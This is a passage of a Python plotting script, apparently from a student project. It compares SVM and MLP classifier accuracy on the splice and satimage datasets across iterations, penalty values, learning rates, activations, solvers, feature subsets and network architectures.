        ([0.754, 0.762, 0.798, 0.812, 0.867, 0.889, 0.921, 0.966, 0.969, 0.997], '#ffa07a', '50% features'),
        ([0.67, 0.7, 0.816, 0.846, 0.874, 0.922, 0.941, 0.966, 0.989, 0.997], '#9999ff', '75% features'),
        ([0.659, 0.719, 0.821, 0.865, 0.894, 0.937, 0.952, 0.981, 0.989, 0.998], '#F0E68C', '100% features'),
    ]
    test_series = [
        ([0.635, 0.571, 0.567, 0.556, 0.585, 0.569, 0.569, 0.573, 0.603, 0.601], '#90EE90', '25% features'),
        ([0.591, 0.547, 0.56, 0.585, 0.586, 0.587, 0.587, 0.598, 0.61, 0.585], '#ffa07a', '50% features'),
        ([0.51, 0.55, 0.584, 0.55, 0.581, 0.645, 0.583, 0.612, 0.637, 0.626], '#9999ff', '75% features'),
        ([0.64, 0.7, 0.774, 0.783, 0.813, 0.844, 0.834, 0.869, 0.874, 0.887], '#F0E68C', '100% features'),
    ]
    for series, out_path in ((train_series, 'report/img/svm_dim_splice_tr'),
                             (test_series, 'report/img/svm_dim_splice_t')):
        plt.figure(figsize=(6, 4))
        ax = plt.gca()
        # Draw all lines first, then all markers, to keep the original order.
        for ys, color, label in series:
            ax.plot(x, ys, color=color, linewidth=1.7, label=label)
        for ys, color, _ in series:
            ax.scatter(x, ys, s=13, c=color)
        ax.grid(color='b', alpha=0.5, linestyle='dashed', linewidth=0.5)
        plt.xlabel('Iterations')
        plt.ylabel('Accuracy')
        plt.legend()
        plt.savefig(out_path)
        plt.show()
def plot_s_dim_sat():
    """SVM accuracy vs. iterations for several feature-subset sizes (sat).

    Hard-coded results of rbf-kernel SVC runs on 25/50/75/100% of the
    features; one figure per data split.
    """
    x = list(range(interval, max_iter + 1, interval))
    train_series = [
        ([0.617, 0.534, 0.558, 0.732, 0.674, 0.766, 0.764, 0.773, 0.797, 0.806], '#90EE90', '25% features'),
        ([0.661, 0.75, 0.749, 0.704, 0.736, 0.819, 0.802, 0.725, 0.809, 0.846], '#ffa07a', '50% features'),
        ([0.709, 0.576, 0.651, 0.803, 0.733, 0.825, 0.811, 0.84, 0.859, 0.835], '#9999ff', '75% features'),
        ([0.633, 0.726, 0.801, 0.655, 0.665, 0.808, 0.833, 0.826, 0.853, 0.857], '#F0E68C', '100% features'),
    ]
    test_series = [
        ([0.489, 0.502, 0.453, 0.496, 0.554, 0.56, 0.536, 0.652, 0.668, 0.663], '#90EE90', '25% features'),
        ([0.585, 0.616, 0.515, 0.571, 0.558, 0.648, 0.622, 0.59, 0.632, 0.658], '#ffa07a', '50% features'),
        ([0.564, 0.426, 0.442, 0.619, 0.487, 0.648, 0.62, 0.648, 0.659, 0.655], '#9999ff', '75% features'),
        ([0.56, 0.673, 0.776, 0.662, 0.684, 0.78, 0.796, 0.796, 0.806, 0.825], '#F0E68C', '100% features'),
    ]
    for series, out_path in ((train_series, 'report/img/svm_dim_sat_tr'),
                             (test_series, 'report/img/svm_dim_sat_t')):
        plt.figure(figsize=(6, 4))
        ax = plt.gca()
        # Draw all lines first, then all markers, to keep the original order.
        for ys, color, label in series:
            ax.plot(x, ys, color=color, linewidth=1.7, label=label)
        for ys, color, _ in series:
            ax.scatter(x, ys, s=13, c=color)
        ax.grid(color='b', alpha=0.5, linestyle='dashed', linewidth=0.5)
        plt.xlabel('Iterations')
        plt.ylabel('Accuracy')
        plt.legend()
        plt.savefig(out_path)
        plt.show()
def plot_s_penalty_splice():
    """Bar chart of SVM train/test accuracy vs. penalty parameter C (splice).

    Accuracies are hard-coded results of rbf-kernel SVC runs with C set
    to each value in `penalties`. Saves to 'report/img/svm_penalty_splice'
    and shows the figure.
    """
    # Fix: the original assigned these C values to `x` and then shadowed
    # `x` as the annotation-loop variable before ever reading it, leaving
    # the list dead. The loop variable is renamed and the list now drives
    # the tick labels (same values as the old literal tuple).
    penalties = [0.01, 0.03, 0.06, 0.1, 0.3, 0.6, 1.0, 3.0, 10.0]
    y_tr = [0.853, 0.903, 0.961, 0.962, 0.962, 0.969, 0.99, 1.0, 1.0]
    y_t = [0.736, 0.805, 0.874, 0.888, 0.893, 0.889, 0.897, 0.895, 0.897]
    x_ax = np.arange(9) * 0.9
    total_width, n = 0.75, 2
    width = total_width / n
    x_ax = x_ax - (total_width - width) / 2
    plt.bar(x_ax, y_tr, width=width, facecolor='#9999ff', edgecolor='white', label='Training set')
    plt.bar(x_ax + width, y_t, width=width, facecolor='#ffa07a', edgecolor='white', label='Testing set')
    # Annotate every bar pair with its accuracy value.
    for xpos, acc_tr, acc_t in zip(x_ax, y_tr, y_t):
        plt.text(xpos - 0.02, acc_tr, '%.2f' % acc_tr, ha='center', va='bottom')
        plt.text(xpos + width + 0.075, acc_t, '%.2f' % acc_t, ha='center', va='bottom')
    ax = plt.gca()
    ax.set_xticks(x_ax + width / 2)
    ax.set_xticklabels(penalties)
    plt.xlabel('Penalty parameter')
    plt.ylabel('Accuracy')
    plt.ylim(0, 1.245)
    plt.legend()
    plt.savefig('report/img/svm_penalty_splice')
    plt.show()
def plot_s_penalty_sat():
    """Bar chart of SVM train/test accuracy vs. penalty parameter C (sat).

    Accuracies are hard-coded results of rbf-kernel SVC runs with C set
    to each value in `penalties`. Saves to 'report/img/svm_penalty_sat'
    and shows the figure.
    """
    # Fix: the original assigned these C values to `x` and then shadowed
    # `x` as the annotation-loop variable before ever reading it, leaving
    # the list dead. The loop variable is renamed and the list now drives
    # the tick labels (same values as the old literal tuple).
    penalties = [0.01, 0.03, 0.06, 0.1, 0.3, 0.6, 1.0, 3.0, 10.0]
    y_tr = [0.807, 0.829, 0.845, 0.854, 0.867, 0.87, 0.875, 0.88, 0.77]
    y_t = [0.786, 0.808, 0.822, 0.826, 0.832, 0.832, 0.835, 0.829, 0.728]
    x_ax = np.arange(9) * 0.9
    total_width, n = 0.75, 2
    width = total_width / n
    x_ax = x_ax - (total_width - width) / 2
    plt.bar(x_ax, y_tr, width=width, facecolor='#9999ff', edgecolor='white', label='Training set')
    plt.bar(x_ax + width, y_t, width=width, facecolor='#ffa07a', edgecolor='white', label='Testing set')
    # Annotate every bar pair with its accuracy value.
    for xpos, acc_tr, acc_t in zip(x_ax, y_tr, y_t):
        plt.text(xpos - 0.04, acc_tr, '%.2f' % acc_tr, ha='center', va='bottom')
        plt.text(xpos + width + 0.075, acc_t, '%.2f' % acc_t, ha='center', va='bottom')
    ax = plt.gca()
    ax.set_xticks(x_ax + width / 2)
    ax.set_xticklabels(penalties)
    plt.xlabel('Penalty parameter')
    plt.ylabel('Accuracy')
    plt.ylim(0, 1.1)
    plt.legend()
    plt.savefig('report/img/svm_penalty_sat')
    plt.show()
def plot_s_baseline():
    """Baseline SVM train/test accuracy curves for splice and sat.

    Hard-coded results from earlier SVC runs; one figure per dataset.
    """
    x = list(range(interval, max_iter + 1, interval))
    y_tr_splice = [0.659, 0.719, 0.821, 0.865, 0.894, 0.937, 0.952, 0.981, 0.989, 0.998]
    y_tr_sat = [0.688, 0.685, 0.676, 0.715, 0.582, 0.624, 0.783, 0.823, 0.826, 0.828]
    y_t_splice = [0.64, 0.7, 0.774, 0.783, 0.813, 0.844, 0.834, 0.869, 0.874, 0.887]
    y_t_sat = [0.664, 0.682, 0.656, 0.707, 0.608, 0.63, 0.764, 0.795, 0.798, 0.804]
    for y_train, y_test, out_path in (
            (y_tr_splice, y_t_splice, 'report/img/svm_baseline_splice'),
            (y_tr_sat, y_t_sat, 'report/img/svm_baseline_sat')):
        plt.figure(figsize=(6, 4))
        ax = plt.gca()
        ax.plot(x, y_train, color='#9999ff', linewidth=1.7, label='Training set')
        ax.plot(x, y_test, color='#ffa07a', linewidth=1.7, label='Testing set')
        ax.scatter(x, y_train, s=13, c='#9999ff')
        ax.scatter(x, y_test, s=13, c='#ffa07a')
        ax.grid(color='b', alpha=0.5, linestyle='dashed', linewidth=0.5)
        plt.xlabel('Iterations')
        plt.ylabel('Accuracy')
        plt.legend()
        plt.savefig(out_path)
        plt.show()
################################### SVM Part #####################################
################################### MLP Part #####################################
def mlp(data_name):
    """Train MLPs with a growing iteration budget and print accuracies.

    Loads 'data/<data_name>_feature.npy' / '_target.npy' (train) and the
    matching '.t_*' files (test), fits an MLPClassifier for each max_iter
    in range(interval, max_iter + 1, interval), and prints the rounded
    train/test accuracy lists.

    Args:
        data_name: dataset file prefix under 'data/'.
    """
    x_tr = np.load('data/' + data_name + '_feature.npy')
    y_tr = np.load('data/' + data_name + '_target.npy')
    x_t = np.load('data/' + data_name + '.t_feature.npy')
    y_t = np.load('data/' + data_name + '.t_target.npy')
    res_tr, res_t = [], []
    for n_iter in range(interval, max_iter + 1, interval):
        clf = MLPClassifier(solver='adam', alpha=1e-3,
                            learning_rate_init=0.001, max_iter=n_iter,
                            activation='relu',
                            hidden_layer_sizes=(100,), random_state=666)
        clf.fit(x_tr, y_tr)
        res_tr.append(round(clf.score(x_tr, y_tr), 3))
        res_t.append(round(clf.score(x_t, y_t), 3))
    print('train: ', res_tr)
    print('test: ', res_t)
def plot_activation_splice():
    """MLP accuracy vs. iterations for three activation functions (splice).

    Hard-coded results from earlier MLPClassifier runs (adam, alpha=1e-3,
    random_state=666, activation varied); one figure per data split.
    """
    x = list(range(interval, max_iter + 1, interval))
    train_series = [
        ([0.698, 0.764, 0.813, 0.845, 0.865, 0.884, 0.906, 0.921, 0.921, 0.921], '#90EE90', 'relu'),
        ([0.517, 0.517, 0.721, 0.799, 0.819, 0.834, 0.845, 0.852, 0.857, 0.861], '#ffa07a', 'sigmoid'),
        ([0.65, 0.732, 0.793, 0.832, 0.863, 0.881, 0.905, 0.915, 0.929, 0.944], '#9999ff', 'tanh'),
    ]
    test_series = [
        ([0.68, 0.759, 0.822, 0.85, 0.857, 0.867, 0.874, 0.883, 0.883, 0.883], '#90EE90', 'relu'),
        ([0.52, 0.52, 0.717, 0.835, 0.832, 0.827, 0.83, 0.834, 0.836, 0.839], '#ffa07a', 'sigmoid'),
        ([0.646, 0.721, 0.777, 0.805, 0.817, 0.822, 0.832, 0.836, 0.84, 0.84], '#9999ff', 'tanh'),
    ]
    for series, out_path in ((train_series, 'report/img/mlp_activation_splice_tr'),
                             (test_series, 'report/img/mlp_activation_splice_t')):
        plt.figure(figsize=(6, 4))
        ax = plt.gca()
        # Draw all lines first, then all markers, to keep the original order.
        for ys, color, label in series:
            ax.plot(x, ys, color=color, linewidth=1.7, label=label)
        for ys, color, _ in series:
            ax.scatter(x, ys, s=13, c=color)
        ax.grid(color='b', alpha=0.5, linestyle='dashed', linewidth=0.5)
        plt.xlabel('Iterations')
        plt.ylabel('Accuracy')
        plt.legend()
        plt.savefig(out_path)
        plt.show()
def plot_activation_sat():
    """MLP accuracy vs. iterations for three activation functions (sat).

    Hard-coded results from earlier MLPClassifier runs (adam, alpha=1e-3,
    random_state=666, activation varied); one figure per data split.
    """
    x = list(range(interval, max_iter + 1, interval))
    train_series = [
        ([0.15, 0.455, 0.816, 0.834, 0.845, 0.847, 0.854, 0.86, 0.862, 0.866], '#90EE90', 'relu'),
        ([0.099, 0.257, 0.419, 0.43, 0.412, 0.396, 0.394, 0.392, 0.39, 0.428], '#ffa07a', 'sigmoid'),
        ([0.476, 0.59, 0.588, 0.624, 0.614, 0.621, 0.629, 0.653, 0.776, 0.803], '#9999ff', 'tanh'),
    ]
    test_series = [
        ([0.17, 0.445, 0.777, 0.788, 0.796, 0.795, 0.806, 0.812, 0.814, 0.814], '#90EE90', 'relu'),
        ([0.106, 0.198, 0.411, 0.421, 0.411, 0.406, 0.403, 0.401, 0.4, 0.452], '#ffa07a', 'sigmoid'),
        ([0.436, 0.566, 0.574, 0.618, 0.605, 0.605, 0.608, 0.622, 0.718, 0.745], '#9999ff', 'tanh'),
    ]
    for series, out_path in ((train_series, 'report/img/mlp_activation_sat_tr'),
                             (test_series, 'report/img/mlp_activation_sat_t')):
        plt.figure(figsize=(6, 4))
        ax = plt.gca()
        # Draw all lines first, then all markers, to keep the original order.
        for ys, color, label in series:
            ax.plot(x, ys, color=color, linewidth=1.7, label=label)
        for ys, color, _ in series:
            ax.scatter(x, ys, s=13, c=color)
        ax.grid(color='b', alpha=0.5, linestyle='dashed', linewidth=0.5)
        plt.xlabel('Iterations')
        plt.ylabel('Accuracy')
        plt.legend()
        plt.savefig(out_path)
        plt.show()
def plot_optimizer_splice():
    """MLP accuracy vs. iterations for three solvers (splice).

    Hard-coded results from earlier MLPClassifier runs (alpha=1e-3,
    random_state=666, solver varied); one figure per data split.
    """
    x = list(range(interval, max_iter + 1, interval))
    train_series = [
        ([0.779, 0.847, 0.88, 0.913, 0.925, 0.943, 0.952, 0.963, 0.964, 0.97], '#90EE90', 'lbfgs'),
        ([0.57, 0.63, 0.643, 0.673, 0.698, 0.723, 0.752, 0.761, 0.781, 0.796], '#ffa07a', 'sgd'),
        ([0.698, 0.764, 0.813, 0.845, 0.865, 0.884, 0.906, 0.921, 0.921, 0.921], '#9999ff', 'adam'),
    ]
    test_series = [
        ([0.794, 0.849, 0.848, 0.874, 0.878, 0.875, 0.873, 0.866, 0.857, 0.855], '#90EE90', 'lbfgs'),
        ([0.595, 0.637, 0.651, 0.671, 0.703, 0.724, 0.746, 0.76, 0.768, 0.788], '#ffa07a', 'sgd'),
        ([0.68, 0.759, 0.822, 0.85, 0.857, 0.867, 0.874, 0.883, 0.883, 0.883], '#9999ff', 'adam'),
    ]
    for series, out_path in ((train_series, 'report/img/mlp_optimizer_splice_tr'),
                             (test_series, 'report/img/mlp_optimizer_splice_t')):
        plt.figure(figsize=(6, 4))
        ax = plt.gca()
        # Draw all lines first, then all markers, to keep the original order.
        for ys, color, label in series:
            ax.plot(x, ys, color=color, linewidth=1.7, label=label)
        for ys, color, _ in series:
            ax.scatter(x, ys, s=13, c=color)
        ax.grid(color='b', alpha=0.5, linestyle='dashed', linewidth=0.5)
        plt.xlabel('Iterations')
        plt.ylabel('Accuracy')
        plt.legend()
        plt.savefig(out_path)
        plt.show()
def plot_optimizer_sat():
    """MLP accuracy vs. iterations for three solvers (sat).

    Hard-coded results from earlier MLPClassifier runs (alpha=1e-3,
    random_state=666, solver varied); one figure per data split.
    """
    x = list(range(interval, max_iter + 1, interval))
    train_series = [
        ([0.257] * 10, '#90EE90', 'lbfgs'),
        ([0.099, 0.257, 0.257, 0.407, 0.434, 0.446, 0.458, 0.471, 0.485, 0.518], '#ffa07a', 'sgd'),
        ([0.15, 0.455, 0.816, 0.834, 0.845, 0.847, 0.854, 0.86, 0.862, 0.866], '#9999ff', 'adam'),
    ]
    test_series = [
        ([0.198] * 10, '#90EE90', 'lbfgs'),
        ([0.106, 0.198, 0.198, 0.397, 0.43, 0.444, 0.45, 0.463, 0.477, 0.508], '#ffa07a', 'sgd'),
        ([0.17, 0.445, 0.777, 0.788, 0.796, 0.795, 0.806, 0.812, 0.814, 0.814], '#9999ff', 'adam'),
    ]
    for series, out_path in ((train_series, 'report/img/mlp_optimizer_sat_tr'),
                             (test_series, 'report/img/mlp_optimizer_sat_t')):
        plt.figure(figsize=(6, 4))
        ax = plt.gca()
        # Draw all lines first, then all markers, to keep the original order.
        for ys, color, label in series:
            ax.plot(x, ys, color=color, linewidth=1.7, label=label)
        for ys, color, _ in series:
            ax.scatter(x, ys, s=13, c=color)
        ax.grid(color='b', alpha=0.5, linestyle='dashed', linewidth=0.5)
        plt.xlabel('Iterations')
        plt.ylabel('Accuracy')
        plt.legend()
        plt.savefig(out_path)
        plt.show()
def plot_lr_splice():
    """Bar chart of MLP train/test accuracy vs. learning rate (splice).

    Accuracies are hard-coded results of MLPClassifier runs (adam,
    alpha=1e-3, max_iter=300, random_state=666) with learning_rate_init
    set to each value in `learning_rates`. Saves to
    'report/img/mlp_lr_splice' and shows the figure.
    """
    # Fix: the original assigned these rates to `x` and then shadowed `x`
    # as the annotation-loop variable before ever reading it, leaving the
    # list dead. The loop variable is renamed and the list now drives the
    # tick labels (same values as the old literal tuple).
    learning_rates = [0.001, 0.003, 0.006, 0.01, 0.03, 0.06, 0.1]
    y_tr = [0.921, 0.937, 0.911, 0.832, 0.517, 0.517, 0.517]
    y_t = [0.883, 0.888, 0.876, 0.833, 0.52, 0.52, 0.52]
    x_ax = np.arange(7)
    total_width, n = 0.75, 2
    width = total_width / n
    x_ax = x_ax - (total_width - width) / 2
    plt.bar(x_ax, y_tr, width=width, facecolor='#9999ff', edgecolor='white', label='Training set')
    plt.bar(x_ax + width, y_t, width=width, facecolor='#ffa07a', edgecolor='white', label='Testing set')
    # Annotate every bar pair with its accuracy value.
    for xpos, acc_tr, acc_t in zip(x_ax, y_tr, y_t):
        plt.text(xpos - 0.02, acc_tr, '%.2f' % acc_tr, ha='center', va='bottom')
        plt.text(xpos + width + 0.05, acc_t, '%.2f' % acc_t, ha='center', va='bottom')
    ax = plt.gca()
    ax.set_xticks(x_ax + width / 2)
    ax.set_xticklabels(learning_rates)
    plt.xlabel('Learning rate')
    plt.ylabel('Accuracy')
    plt.legend()
    plt.savefig('report/img/mlp_lr_splice')
    plt.show()
def plot_lr_sat():
    """Bar chart of MLP train/test accuracy vs. learning rate (sat).

    Accuracies are hard-coded results of MLPClassifier runs (adam,
    alpha=1e-3, max_iter=300, random_state=666) with learning_rate_init
    set to each value in `learning_rates`. Saves to
    'report/img/mlp_lr_sat' and shows the figure.
    """
    # Fix: the original assigned these rates to `x` and then shadowed `x`
    # as the annotation-loop variable before ever reading it, leaving the
    # list dead. The loop variable is renamed and the list now drives the
    # tick labels (same values as the old literal tuple).
    learning_rates = [0.001, 0.003, 0.006, 0.01, 0.03, 0.06, 0.1]
    y_tr = [0.877, 0.875, 0.87, 0.832, 0.87, 0.862, 0.715]
    y_t = [0.832, 0.818, 0.812, 0.833, 0.826, 0.817, 0.661]
    x_ax = np.arange(7)
    total_width, n = 0.75, 2
    width = total_width / n
    x_ax = x_ax - (total_width - width) / 2
    plt.bar(x_ax, y_tr, width=width, facecolor='#9999ff', edgecolor='white', label='Training set')
    plt.bar(x_ax + width, y_t, width=width, facecolor='#ffa07a', edgecolor='white', label='Testing set')
    # Annotate every bar pair with its accuracy value.
    for xpos, acc_tr, acc_t in zip(x_ax, y_tr, y_t):
        plt.text(xpos - 0.02, acc_tr, '%.2f' % acc_tr, ha='center', va='bottom')
        plt.text(xpos + width + 0.05, acc_t, '%.2f' % acc_t, ha='center', va='bottom')
    ax = plt.gca()
    ax.set_xticks(x_ax + width / 2)
    ax.set_xticklabels(learning_rates)
    plt.xlabel('Learning rate')
    plt.ylabel('Accuracy')
    plt.ylim(0, 1.06)
    plt.legend()
    plt.savefig('report/img/mlp_lr_sat')
    plt.show()
def plot_dim_splice():
    """MLP accuracy vs. iterations for several feature-subset sizes (splice).

    Hard-coded results from earlier MLPClassifier runs on 25/50/75/100%
    of the features; one figure per data split.
    """
    x = list(range(interval, max_iter + 1, interval))
    train_series = [
        ([0.665, 0.727, 0.769, 0.792, 0.815, 0.832, 0.841, 0.853, 0.865, 0.876], '#90EE90', '25% features'),
        ([0.541, 0.727, 0.814, 0.833, 0.854, 0.864, 0.876, 0.887, 0.899, 0.909], '#ffa07a', '50% features'),
        ([0.524, 0.712, 0.811, 0.858, 0.891, 0.914, 0.932, 0.956, 0.964, 0.974], '#9999ff', '75% features'),
        ([0.698, 0.764, 0.813, 0.845, 0.865, 0.884, 0.906, 0.921, 0.921, 0.921], '#F0E68C', '100% features'),
    ]
    # NOTE(review): the 50%-features test curve below duplicates the 50%
    # training curve — looks like a copy-paste in the recorded results;
    # verify against the experiment logs.
    test_series = [
        ([0.392, 0.443, 0.486, 0.525, 0.55, 0.562, 0.573, 0.574, 0.575, 0.58], '#90EE90', '25% features'),
        ([0.541, 0.727, 0.814, 0.833, 0.854, 0.864, 0.876, 0.887, 0.899, 0.909], '#ffa07a', '50% features'),
        ([0.522, 0.564, 0.56, 0.569, 0.571, 0.571, 0.576, 0.586, 0.586, 0.582], '#9999ff', '75% features'),
        ([0.68, 0.759, 0.822, 0.85, 0.857, 0.867, 0.874, 0.883, 0.883, 0.883], '#F0E68C', '100% features'),
    ]
    for series, out_path in ((train_series, 'report/img/mlp_dim_splice_tr'),
                             (test_series, 'report/img/mlp_dim_splice_t')):
        plt.figure(figsize=(6, 4))
        ax = plt.gca()
        # Draw all lines first, then all markers, to keep the original order.
        for ys, color, label in series:
            ax.plot(x, ys, color=color, linewidth=1.7, label=label)
        for ys, color, _ in series:
            ax.scatter(x, ys, s=13, c=color)
        ax.grid(color='b', alpha=0.5, linestyle='dashed', linewidth=0.5)
        plt.xlabel('Iterations')
        plt.ylabel('Accuracy')
        plt.legend()
        plt.savefig(out_path)
        plt.show()
def plot_dim_sat():
    """MLP accuracy vs. iterations for several feature-subset sizes (sat).

    Hard-coded results from earlier MLPClassifier runs on 25/50/75/100%
    of the features; one figure per data split.
    """
    x = list(range(interval, max_iter + 1, interval))
    train_series = [
        ([0.413, 0.44, 0.489, 0.681, 0.79, 0.8, 0.809, 0.815, 0.823, 0.826], '#90EE90', '25% features'),
        ([0.174, 0.396, 0.477, 0.649, 0.769, 0.776, 0.792, 0.806, 0.823, 0.832], '#ffa07a', '50% features'),
        ([0.342, 0.406, 0.412, 0.416, 0.453, 0.504, 0.742, 0.754, 0.763, 0.798], '#9999ff', '75% features'),
        ([0.15, 0.455, 0.816, 0.834, 0.845, 0.847, 0.854, 0.86, 0.862, 0.866], '#F0E68C', '100% features'),
    ]
    test_series = [
        ([0.384, 0.424, 0.482, 0.604, 0.683, 0.68, 0.669, 0.664, 0.664, 0.662], '#90EE90', '25% features'),
        ([0.235, 0.3, 0.354, 0.536, 0.604, 0.574, 0.57, 0.568, 0.575, 0.583], '#ffa07a', '50% features'),
        ([0.322, 0.372, 0.382, 0.432, 0.452, 0.464, 0.462, 0.469, 0.487, 0.522], '#9999ff', '75% features'),
        ([0.17, 0.445, 0.777, 0.788, 0.796, 0.795, 0.806, 0.812, 0.814, 0.814], '#F0E68C', '100% features'),
    ]
    for series, out_path in ((train_series, 'report/img/mlp_dim_sat_tr'),
                             (test_series, 'report/img/mlp_dim_sat_t')):
        plt.figure(figsize=(6, 4))
        ax = plt.gca()
        # Draw all lines first, then all markers, to keep the original order.
        for ys, color, label in series:
            ax.plot(x, ys, color=color, linewidth=1.7, label=label)
        for ys, color, _ in series:
            ax.scatter(x, ys, s=13, c=color)
        ax.grid(color='b', alpha=0.5, linestyle='dashed', linewidth=0.5)
        plt.xlabel('Iterations')
        plt.ylabel('Accuracy')
        plt.legend()
        plt.savefig(out_path)
        plt.show()
def plot_archi_sat():
    """Plot MLP accuracy vs. iterations for four architectures (satimage).

    The accuracy values below were collected offline from
    MLPClassifier(solver='adam', alpha=1e-3, learning_rate_init=0.001,
    max_iter=i, activation='relu', random_state=666) with
    hidden_layer_sizes of:
      1: (10, 10)          2: (10, 10, 10, 10)
      3: (50, 50)          4: (50, 50, 50, 50)

    Saves two figures: report/img/mlp_archi_sat_tr (training accuracy)
    and report/img/mlp_archi_sat_t (testing accuracy).
    Relies on module-level `interval`, `max_iter`, and `plt`.
    """
    x = list(range(interval, max_iter + 1, interval))
    # Hard-coded training-set accuracy curves, one per architecture.
    y_1_tr = [0.15, 0.455, 0.816, 0.834, 0.845, 0.847, 0.854, 0.86, 0.862, 0.866]
    y_2_tr = [0.257, 0.257, 0.257, 0.257, 0.257, 0.257, 0.257, 0.257, 0.257, 0.257]
    y_3_tr = [0.679, 0.729, 0.743, 0.756, 0.762, 0.769, 0.847, 0.858, 0.871, 0.901]
    y_4_tr = [0.337, 0.558, 0.558, 0.611, 0.652, 0.652, 0.652, 0.652, 0.652, 0.652]
    # Testing-set accuracy curves.
    y_1_t = [0.17, 0.445, 0.777, 0.788, 0.796, 0.795, 0.806, 0.812, 0.814, 0.814]
    y_2_t = [0.198, 0.198, 0.198, 0.198, 0.198, 0.198, 0.198, 0.198, 0.198, 0.198]
    y_3_t = [0.652, 0.714, 0.719, 0.723, 0.726, 0.727, 0.779, 0.79, 0.814, 0.83]
    y_4_t = [0.279, 0.484, 0.476, 0.552, 0.606, 0.606, 0.606, 0.606, 0.606, 0.606]

    labels = ['(10, 10)', '(10, 10, 10, 10)', '(50, 50)', '(50, 50, 50, 50)']
    colors = ['#90EE90', '#ffa07a', '#9999ff', '#F0E68C']

    def _draw(curves, y_max, out_path):
        # Render one accuracy-vs-iterations figure and write it to out_path.
        plt.figure(figsize=(6, 4))
        ax = plt.gca()
        # Plot all lines first, then all markers, so legend order and
        # draw order match the original hand-unrolled version.
        for y, color, label in zip(curves, colors, labels):
            ax.plot(x, y, color=color, linewidth=1.7, label=label)
        for y, color in zip(curves, colors):
            ax.scatter(x, y, s=13, c=color)
        ax.grid(color='b', alpha=0.5, linestyle='dashed', linewidth=0.5)
        plt.xlabel('Iterations')
        plt.ylabel('Accuracy')
        if y_max is not None:
            plt.ylim(0, y_max)
        plt.legend()
        plt.savefig(out_path)
        plt.show()

    _draw([y_1_tr, y_2_tr, y_3_tr, y_4_tr], 0.97, 'report/img/mlp_archi_sat_tr')
    _draw([y_1_t, y_2_t, y_3_t, y_4_t], 0.92, 'report/img/mlp_archi_sat_t')
def plot_archi_splice():
    """Plot MLP accuracy vs. iterations for four architectures (splice).

    The accuracy values below were collected offline from
    MLPClassifier(solver='adam', alpha=1e-3, learning_rate_init=0.001,
    max_iter=i, activation='relu', random_state=666) with
    hidden_layer_sizes of:
      1: (10, 10)          2: (10, 10, 10, 10)
      3: (50, 50)          4: (50, 50, 50, 50)

    Saves two figures: report/img/mlp_archi_splice_tr (training accuracy,
    auto y-limits) and report/img/mlp_archi_splice_t (testing accuracy,
    y capped at 0.92). Relies on module-level `interval`, `max_iter`, `plt`.
    """
    x = list(range(interval, max_iter + 1, interval))
    # Hard-coded training-set accuracy curves, one per architecture.
    y_1_tr = [0.698, 0.764, 0.813, 0.845, 0.865, 0.884, 0.906, 0.921, 0.921, 0.921]
    y_2_tr = [0.616, 0.691, 0.779, 0.827, 0.838, 0.858, 0.86, 0.86, 0.86, 0.86]
    y_3_tr = [0.483, 0.483, 0.483, 0.483, 0.483, 0.483, 0.483, 0.483, 0.483, 0.483]
    y_4_tr = [0.785, 0.867, 0.914, 0.969, 0.992, 1.0, 1.0, 1.0, 1.0, 1.0]
    # Testing-set accuracy curves.
    y_1_t = [0.68, 0.759, 0.822, 0.85, 0.857, 0.867, 0.874, 0.883, 0.883, 0.883]
    y_2_t = [0.608, 0.687, 0.775, 0.816, 0.835, 0.843, 0.842, 0.842, 0.842, 0.842]
    y_3_t = [0.48, 0.48, 0.48, 0.48, 0.48, 0.48, 0.48, 0.48, 0.48, 0.48]
    y_4_t = [0.76, 0.83, 0.844, 0.844, 0.849, 0.842, 0.841, 0.844, 0.844, 0.844]

    labels = ['(10, 10)', '(10, 10, 10, 10)', '(50, 50)', '(50, 50, 50, 50)']
    colors = ['#90EE90', '#ffa07a', '#9999ff', '#F0E68C']

    def _draw(curves, y_max, out_path):
        # Render one accuracy-vs-iterations figure and write it to out_path.
        plt.figure(figsize=(6, 4))
        ax = plt.gca()
        # Lines first, then markers, preserving the original artist order.
        for y, color, label in zip(curves, colors, labels):
            ax.plot(x, y, color=color, linewidth=1.7, label=label)
        for y, color in zip(curves, colors):
            ax.scatter(x, y, s=13, c=color)
        ax.grid(color='b', alpha=0.5, linestyle='dashed', linewidth=0.5)
        plt.xlabel('Iterations')
        plt.ylabel('Accuracy')
        if y_max is not None:
            plt.ylim(0, y_max)
        plt.legend()
        plt.savefig(out_path)
        plt.show()

    # NOTE: the original set no explicit y-limit on the training figure.
    _draw([y_1_tr, y_2_tr, y_3_tr, y_4_tr], None, 'report/img/mlp_archi_splice_tr')
    _draw([y_1_t, y_2_t, y_3_t, y_4_t], 0.92, 'report/img/mlp_archi_splice_t')
def plot_baseline():
    """Plot baseline MLP training/testing accuracy for both datasets.

    Uses the hard-coded accuracy values below (collected offline) and saves
    one figure per dataset: report/img/mlp_baseline_splice and
    report/img/mlp_baseline_sat. Relies on module-level `interval`,
    `max_iter`, and `plt`.
    """
    x = list(range(interval, max_iter + 1, interval))
    # Hard-coded accuracy curves: (training, testing) per dataset.
    y_tr_splice = [0.837, 0.861, 0.888, 0.9, 0.935, 0.947, 0.965, 0.981, 0.988, 0.995]
    y_tr_sat = [0.834, 0.862, 0.879, 0.892, 0.899, 0.905, 0.913, 0.919, 0.924, 0.93]
    y_t_splice = [0.828, 0.849, 0.857, 0.851, 0.867, 0.874, 0.883, 0.886, 0.887, 0.891]
    y_t_sat = [0.816, 0.831, 0.838, 0.854, 0.862, 0.865, 0.868, 0.872, 0.872, 0.875]

    def _draw(y_train, y_test, out_path):
        # Render one train-vs-test accuracy figure and write it to out_path.
        plt.figure(figsize=(6, 4))
        ax = plt.gca()
        ax.plot(x, y_train, color='#9999ff', linewidth=1.7, label='Training set')
        ax.plot(x, y_test, color='#ffa07a', linewidth=1.7, label='Testing set')
        ax.scatter(x, y_train, s=13, c='#9999ff')
        ax.scatter(x, y_test, s=13, c='#ffa07a')
        ax.grid(color='b', alpha=0.5, linestyle='dashed', linewidth=0.5)
        plt.xlabel('Iterations')
        plt.ylabel('Accuracy')
        plt.legend()
        plt.savefig(out_path)
        plt.show()

    _draw(y_tr_splice, y_t_splice, 'report/img/mlp_baseline_splice')
    _draw(y_tr_sat, y_t_sat, 'report/img/mlp_baseline_sat')
################################### MLP Part #####################################
if __name__ == '__main__':
    # Datasets used throughout: 'splice' and 'satimage.scale'.
    ## MLP ##
    # mlp('satimage.scale')
    # mlp('splice')
    plot_baseline()
    ## SVM ##
    # svm('satimage.scale')
    # svm('splice')
    # plot_s_baseline()
| 45.970218
| 104
| 0.588034
| 7,554
| 40,132
| 2.996029
| 0.082473
| 0.017144
